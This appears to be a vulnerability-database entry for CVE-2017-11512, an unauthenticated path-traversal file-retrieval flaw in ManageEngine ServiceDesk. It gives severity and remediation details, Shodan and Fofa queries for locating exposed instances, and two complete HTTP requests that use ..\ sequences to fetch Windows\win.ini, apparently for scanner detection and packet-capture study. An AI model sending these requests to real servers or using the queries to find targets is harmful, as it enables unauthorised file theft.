| Title | ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval |
|---|---|
| Author | 0x_Akoko |
| Severity | High |
| Impact | An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage. |
| Remediation | Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328 or apply the necessary security patches. |
| CVSS Score | 7.5 |
| EPSS Score | 0.8294 |
| CVE ID | CVE-2017-11512 |
| CWE ID | CWE-22 |
| Shodan Query | http.title:"ManageEngine"http.title:"manageengine" |
| Fofa Query | title="manageengine" |
| Tags | cve cve2017 manageengine lfr unauth tenable vkev vuln |
ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
GET /fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-11512.yaml
🦈 Packet Capture: ⬇️ Download cve-2017-11512.pcap
N/AN/A